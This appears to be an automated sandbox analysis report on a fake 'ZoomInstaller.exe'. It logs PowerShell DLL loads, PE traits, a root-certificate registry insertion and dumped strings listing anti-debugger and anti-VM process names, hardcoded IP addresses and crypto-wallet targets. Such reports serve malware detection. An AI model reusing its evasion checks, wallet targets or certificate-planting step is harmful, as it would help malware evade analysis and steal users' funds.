Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Users\user\Desktop\ZoomInstaller.exe | Process created: C:\Windows\System32\tasklist.exe tasklist
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: ZoomInstaller.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
Source: ZoomInstaller.exe | Static PE information: Image base 0x140000000 > 0x60000000
Source: ZoomInstaller.exe | Static file information: File size 22207488 > 1048576
Source: ZoomInstaller.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x3e6000
Source: ZoomInstaller.exe | Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x30f000
Source: ZoomInstaller.exe | Static PE information: Raw size of /19 is bigger than: 0x100000 < 0x4e8c00
Source: ZoomInstaller.exe | Static PE information: Raw size of /45 is bigger than: 0x100000 < 0x203200
Source: ZoomInstaller.exe | Static PE information: Raw size of /81 is bigger than: 0x100000 < 0x38fe00
Source: ZoomInstaller.exe | Static PE information: Raw size of /92 is bigger than: 0x100000 < 0x112200
Source: ZoomInstaller.exe | Static PE information: Raw size of /141 is bigger than: 0x100000 < 0x17ec00
Source: ZoomInstaller.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: ZoomInstaller.exe | Static PE information: section name: .xdata
Source: ZoomInstaller.exe | Static PE information: section name: /4
Source: ZoomInstaller.exe | Static PE information: section name: /19
Source: ZoomInstaller.exe | Static PE information: section name: /31
Source: ZoomInstaller.exe | Static PE information: section name: /45
Source: ZoomInstaller.exe | Static PE information: section name: /57
Source: ZoomInstaller.exe | Static PE information: section name: /70
Source: ZoomInstaller.exe | Static PE information: section name: /81
Source: ZoomInstaller.exe | Static PE information: section name: /92
Source: ZoomInstaller.exe | Static PE information: section name: /106
Source: ZoomInstaller.exe | Static PE information: section name: /125
Source: ZoomInstaller.exe | Static PE information: section name: /141
Source: ZoomInstaller.exe | Static PE information: section name: /157
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_00007FFD347600BD pushad ; iretd 17_2_00007FFD347600C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 20_2_00007FFD347600BD pushad ; iretd 20_2_00007FFD347600C1

    Persistence and Installation Behavior

    Source: C:\Users\user\Desktop\ZoomInstaller.exe - Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
    Source: C:\Users\user\Desktop\ZoomInstaller.exe - Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
    Source: C:\Users\user\Desktop\ZoomInstaller.exe - Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
    Source: C:\Users\user\Desktop\ZoomInstaller.exe - Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
    Source: C:\Users\user\Desktop\ZoomInstaller.exe - Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wbem\WMIC.exe - Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wbem\WMIC.exe - Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exe - Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
    Source: C:\Windows\System32\tasklist.exe - Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
    Source: C:\Windows\System32\tasklist.exe - Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    Source: ZoomInstaller.exeBinary or memory string: SCHED={PC:, GP->STATUS= PLUGINPATH= : UNKNOWN PC CALLED FROM RUNTIME: PID=LEVEL 3 RESETSRMOUNT ERRORTIMER EXPIREDEXCHANGE FULLREGENUMKEYEXWREGOPENKEYEXWCERTOPENSTOREFINDNEXTFILEWMAPVIEWOFFILEVIRTUALUNLOCKWRITECONSOLEWFREEADDRINFOWGETHOSTBYNAMEGETSERVBYNAMEPARSING TIME OUT OF RANGE IS TOO LARGENOT AVAILABLEDALTLDPSUGCT?3814697265625GETTEMPPATH2WMODULE32NEXTWRTLGETVERSIONREGENUMVALUEWIMAGELIST_ADDCREATERECTRGNGETDEVICECAPSSETBRUSHORGEXCREATEACTCTXWFINDRESOURCEWRTLMOVEMEMORYCOTASKMEMFREEOLEINITIALIZESYSFREESTRINGWGLSHARELISTSPDHCLOSEQUERYSHELLEXECUTEWANIMATEWINDOWDESTROYWINDOWDRAWFOCUSRECTGETCLASSNAMEWGETCLIENTRECTGETMENUITEMIDGETSCROLLINFOGETSYSTEMMENUGETWINDOWRECTOPENCLIPBOARDSETSCROLLINFOGETTHEMECOLOROPENTHEMEDATAENUMPRINTERSWNAME TOO LONGTLSMAXRSASIZEACCESS DENIEDUSER CANCELEDPKCS1WITHSHA1ECDSAWITHSHA1CLIENT_RANDOMGZIP, DEFLATEGOCACHEVERIFYINSTALLGOROOTHTML/TEMPLATEREGDELETEKEYWDELETESERVICESTARTSERVICEWGETDRIVETYPEWTHREAD32FIRSTWAITCOMMEVENTRTLINITSTRINGENUMPROCESSESEXITWINDOWSEXTIMEENDPERIODWTSFREEMEMORYINVALID ASN.1SHA256-RSAPSSSHA384-RSAPSSSHA512-RSAPSSEMAIL ADDRESSSHARED_SECRETEMPTY INTEGERUNSUPPORTED: 181.214.153.11194.154.78.137213.33.190.21988.153.199.169194.154.78.16092.211.109.160188.105.91.11634.141.146.114188.105.91.173193.128.114.4588.132.227.23888.132.226.20388.132.225.10092.211.192.144192.211.110.74188.105.91.143178.239.165.7034.253.248.228TVAUENRRRAOKWAVMWARE SVGA 3DVMWAREUSER.EXEXENSERVICE.EXEVMWARETRAY.EXECHROME DEFAULTYANDEX DEFAULTCOCCOC DEFAULTIS A DIRECTORY_SECURE_DELETEUNEXPECTED EOFINTERNAL ERRORGETPROTOBYNAMEUNKNOWN MODE: CONTENT-LENGTHMAX_FRAME_SIZEPROTOCOL_ERRORINTERNAL_ERRORREFUSED_STREAMERR_UNKNOWN_%DACCEPT-CHARSETCONTENT-LENGTHREAD_FRAME_EOFUNKNOWN ERROR UNKNOWN CODE: NOT ACCEPTABLECOMPUTERNAMEEX
    Source: ZoomInstaller.exeBinary or memory string: MOREBUF={PC:: NO FRAME (SP=RUNTIME: FRAME TS SET IN TIMERTRACEBACK STUCKADVERTISE ERRORKEY HAS EXPIREDNETWORK IS DOWNNO MEDIUM FOUNDNO SUCH PROCESSGETADAPTERSINFOCREATEHARDLINKWDEVICEIOCONTROLFLUSHVIEWOFFILEGETCOMMANDLINEWGETSTARTUPINFOWPROCESS32FIRSTWUNMAPVIEWOFFILEFAILED TO LOAD FAILED TO FIND : CANNOT PARSE ,M3.2.0,M11.1.0476837158203125IMPERSONATESELFOPENTHREADTOKENINVALID ARGSIZE<INVALID VALUE>REFLECTLITE.SETEXCLUDECLIPRECTGETENHMETAFILEWGETTEXTMETRICSWPLAYENHMETAFILEGDIPLUSSHUTDOWNGETTHREADLOCALEOLEUNINITIALIZEWGLGETCURRENTDCDRAGACCEPTFILESCALLWINDOWPROCWCREATEPOPUPMENUCREATEWINDOWEXWDIALOGBOXPARAMWGETACTIVEWINDOWGETDPIFORWINDOWGETRAWINPUTDATAINSERTMENUITEMWISWINDOWENABLEDISWINDOWVISIBLEPOSTQUITMESSAGESETACTIVEWINDOWSETWINEVENTHOOKTRACKMOUSEEVENTWINDOWFROMPOINTDRAWTHEMETEXTEXACCEPT-LANGUAGEX-FORWARDED-FOR()<>@,;:\"/[]?=INVALID POINTERX509KEYPAIRLEAFRECORD OVERFLOWBAD CERTIFICATEPKCS1WITHSHA256PKCS1WITHSHA384PKCS1WITHSHA512CLIENTAUTHTYPE(UNKNOWN VERSIONJSTMPLLITINTERPTARINSECUREPATHX509USEPOLICIESREGCREATEKEYEXWREGDELETEVALUEW IS UNAVAILABLEGETSECURITYINFOSETSECURITYINFOADDDLLDIRECTORYFINDNEXTVOLUMEWFINDVOLUMECLOSEGETCOMMTIMEOUTSISWOW64PROCESS2QUERYDOSDEVICEWSETCOMMTIMEOUTSSETVOLUMELABELWRTLDEFAULTNPACLCLSIDFROMSTRINGSTRINGFROMGUID2ISWINDOWUNICODETIMEBEGINPERIOD0601021504Z0700INVALID BOOLEANNON-MINIMAL TAGUNKNOWN GO TYPEAVX512VPOPCNTDQHTTP TOOLKIT.EXEJOEBOXSERVER.EXE0123456789ABCDEFREAD AFTER CLOSEAFTER OBJECT KEYGETDESKTOPWINDOW2006-01-02 15:042006-01-02T15:04STRING TOO LARGE_WRITABLE_SCHEMAAUTH_USER_CHANGEAUTH_USER_DELETEDIVISION BY ZERO()<>@,;:\"/[]?= HOSTLOOKUPORDER=/ETC/RESOLV.CONFNON-IPV4 ADDRESSNON-IPV6 ADDRESSUNKNOWN NETWORK NO COLON ON LINESETTINGS_TIMEOUTFRAME_SIZE_ERRORCONTENT-ENCODINGCONTENT-ENCODINGCONTENT-LANGUAGECONTENT-LOCATIONWWW-AUTHENTICATEPROXY-CONNECTIONREAD_FRAME_OTHER%S %S HTTP/1.1
    Source: ZoomInstaller.exeBinary or memory string: HANDSHAKEMATH/RANDWINMM.DLLPURGECOMMSETUPCOMMINFO_HASHQ9IATRKPRHQARZHRDBPJD1BNJKFVLHPXMDUOPVYXX64DBG.EXEX96DBG.EXEVMSRVC.EXEX32DBG.EXEPRL_CC.EXECHROME.EXEMSEDGE.EXEMOTDEPASSEPASSPHRASESAUVEGARDEMATHWALLETEVERWALLETPETRAAPTOSFEWCHAMOVEPALIWALLETMETAMASK_EMETAMASK_O FOR TYPE USER32.DLL2006-01-02_AUTH_USER_AUTH_PASS_AUTH_SALTIMPOSSIBLE
    Source: ZoomInstaller.exeBinary or memory string: INVALID EXCHANGENO ROUTE TO HOSTINVALID ARGUMENTMESSAGE TOO LONGOBJECT IS REMOTEREMOTE I/O ERRORSETFILEPOINTEREXOPENPROCESSTOKENREGQUERYINFOKEYWREGQUERYVALUEEXWDNSNAMECOMPARE_WCREATEDIRECTORYWFLUSHFILEBUFFERSGETCOMPUTERNAMEWGETFULLPATHNAMEWGETLONGPATHNAMEWREMOVEDIRECTORYWNETAPIBUFFERFREETIME: BAD [0-9]*2384185791015625GODEBUG: VALUE "DUPLICATETOKENEXGETCURRENTTHREADRTLVIRTUALUNWIND: VALUE OF TYPE CONTEXT CANCELEDIMAGELIST_CREATEIMAGELIST_DRAWEXGETOPENFILENAMEWGETSAVEFILENAMEWCLOSEENHMETAFILECOPYENHMETAFILEWCREATEDIBSECTIONGETVIEWPORTORGEXSETVIEWPORTORGEXGDIPDISPOSEIMAGEGETCONSOLETITLEWGETCONSOLEWINDOWGETMODULEHANDLEWGETNUMBERFORMATWCOCREATEINSTANCECOGETCLASSOBJECTWGLCREATECONTEXTWGLDELETECONTEXTPDHVALIDATEPATHWADJUSTWINDOWRECTBRINGWINDOWTOTOPDISPATCHMESSAGEWENUMCHILDWINDOWSGETCLIPBOARDDATAGETMENUITEMCOUNTGETMENUITEMINFOWGETSYSCOLORBRUSHGETSYSTEMMETRICSISDIALOGMESSAGEWUNREGISTERCLASSWREGISTERCLASSEXWSETCLIPBOARDDATASETMENUITEMINFOWTRACKPOPUPMENUEXTRANSLATEMESSAGEGETTHEMEPARTSIZECONTENT-LANGUAGEINVALID DNS NAMERCODEFORMATERRORUNPACKING HEADERNO RENEGOTIATIONSIGNATURESCHEME(INVALID ENCODINGSETENTRIESINACLWSETSERVICESTATUSCRYPTPROTECTDATACRYPTQUERYOBJECTCONNECTNAMEDPIPECREATEJOBOBJECTWCREATENAMEDPIPEWDEFINEDOSDEVICEWFINDFIRSTVOLUMEWGETLOGICALDRIVESGETNAMEDPIPEINFOGETPRIORITYCLASSSETDLLDIRECTORYWSETFILEVALIDDATASETPRIORITYCLASSVIRTUALPROTECTEXRTLGETCURRENTPEBGETGUITHREADINFOWINVERIFYTRUSTEXLENGTH TOO LARGEAVX512VPCLMULQDQFIDDLER.WEBUI.EXEVGAUTHSERVICE.EXEPROCESSHACKER.EXEJOEBOXCONTROL.EXEWRITE AFTER CLOSEREFLECT.VALUE.INTIN STRING LITERAL0123456789ABCDEFX0123456789ABCDEFX%%!%C(BIG.INT=%S)MULTIPARTMAXPARTSMESSAGE TOO LARGEINVALID STREAM IDTRANSFER-ENCODINGHEADER_TABLE_SIZECOMPRESSION_ERRORENHANCE_YOUR_CALMHTTP_1_1_REQUIREDIF-MODIFIED-SINCEFRAME_PING_LENGTHTRUNCATED HEADERSIF-MODIFIED-SINCETRANSFER-ENCODINGX-FORWARDED-PROTOX-IDEMPOTENCY-KEYMOVED PERMANENTLYFAILED DEPENDENCYTOO MANY REQUESTSWINREADLINKVOLUMEEXEC: 
KILLING CMDEXEC: NOT STARTEDGOROUTINE PROFILEALLTHREADSSYSCALLGC ASSIST MARKINGSELECT (NO CASES)SYNC.RWMUTEX.LOCKWAIT FOR GC CYCLETRACE PROC STATUSSYNC.(*COND).WAIT: MISSING METHOD NOTETSLEEPG ON G0BAD TINYSIZECLASSKEY ALIGN TOO BIGRUNTIME: POINTER G ALREADY SCANNEDMARK - BAD STATUSSCANOBJECT N == 0SWEPT CACHED SPANMARKBITS OVERFLOWRUNTIME: SUMMARY[RUNTIME: LEVEL = , P.SEARCHADDR = RTLGETCURRENTPEBRUNTIME.NEWOSPROCRUNTIME/INTERNAL/THREAD EXHAUSTIONLOCKED M0 WOKE UPENTERSYSCALLBLOCK SPINNINGTHREADS=GP.WAITING != NILUNKNOWN CALLER PCSTACK: FRAME={SP:RUNTIME: NAMEOFF RUNTIME: TYPEOFF RUNTIME: TEXTOFF PERMISSION DENIEDWRONG MEDIUM TYPENO DATA AVAILABLEEXEC FORMAT ERRORLOOKUPACCOUNTSIDWDNSRECORDLISTFREEGETCURRENTPROCESSGETSHORTPATHNAMEWWSAENUMPROTOCOLSWGTB STANDARD TIMEFLE STANDARD TIMEGMT STANDARD TIMECORRUPT ZIP FILE FRACTIONAL SECONDINDEX > WINDOWEND1192092895507812559604644775390625INVALID BIT SIZE UNKNOWN TYPE KIND HAS INVALID NAMEREFLECT: CALL OF REFLECT.VALUE.LENREFLECT: NEW(NIL)IMAGELIST_DESTROYCHOOSEPIXELFORMATDELETEENHMETAFILEINTERSECTCLIPR
    Source: ZoomInstaller.exeBinary or memory string: RUNQUEUE= STOPWAIT= RUNQSIZE= GFREECNT= THROWING= SPINNING=ATOMICAND8FLOAT64NANFLOAT32NANEXCEPTION PTRSIZE= TARGETPC= UNTIL PC=UNKNOWN PCRUNTIME: GGOROUTINE TERMINATEDOWNER DIEDDNSQUERY_WGETIFENTRYCANCELIOEXCREATEPIPEGETVERSIONWSACLEANUPWSASTARTUPGETSOCKOPTDNSAPI.DLLWS2_32.DLL%!WEEKDAY(SHORT READ12207031256103515625PARSEFLOATLOCKFILEEXWSASOCKETWCOMPLEX128T.KIND == COMBINERGNGETBKCOLORGETOBJECTWSETBKCOLORSTRETCHBLTALPHABLENDGLOBALFREEGLOBALLOCKDRAGFINISHBEGINPAINTCREATEMENUDELETEMENUDRAWICONEXGETDLGITEMGETSUBMENULOADIMAGEWMOVEWINDOWREMOVEMENUSETCAPTURESHOWWINDOWCONTENT-IDMESSAGE-IDPARSEADDR(INVALID IPCLASSCSNETCLASSCHAOSADDITIONALSKIPPING: RES BINDERRES MASTERRESUMPTIONEXP MASTERHTTP_PROXYHTTP_PROXYHTTP2DEBUGCRYPTO/TLSRIPEMD-160DWMAPI.DLLISVALIDSIDLOCALALLOCOPENEVENTWOPENMUTEXWOPENTHREADPULSEEVENTRESETEVENTSHA256-RSASHA384-RSASHA512-RSADSA-SHA256ECDSA-SHA1BASE_NONCEPOSTALCODEAVX512IFMAAVX512VBMIAVX512VNNIAVX512GFNIAVX512VAESAVX512BF1678.139.8.5095.25.81.2435.199.6.1380.211.0.9734.105.0.27FV-AZ269-80ARCHIBALDPCRUNNERADMINAAYRAP7XFUOWATCHER.EXEMITMWEB.EXECHARLES.EXEPOSTMAN.EXEFIDDLER.EXEOLLYDBG.EXEFIDDLER.EXEREGEDIT.EXETASKMGR.EXEVMUSRVC.EXEDF5SERV.EXEQEMU-GA.EXEOLLYDBG.EXEDISCORD.EXEUSER_DATA#2USER_DATA#3USER_DATA#4USER_DATA#5IDENTIFIANTYOROIWALLETKARDIACHAINNIFTYWALLETBRAVEWALLETEQUALWALLETGUILDWALLETMARSHALJSONMARSHALTEXTUNREACHABLE_AUTH_CRYPT_QUERY_ONLY_CACHE_SIZESHORT WRITESUBMISSIONSNIL CONTEXTI/O TIMEOUTHTTP2SERVERHTTP2CLIENTENABLE_PUSHEND_HEADERS/INDEX.HTML ERRCODE=%V, SETTINGS:RETRY-AFTERTTL EXPIREDEARLY HINTSBAD REQUESTBAD GATEWAY/DEV/STDOUT/DEV/STDERROPENPROCESSGETFILETYPE BYTES ...
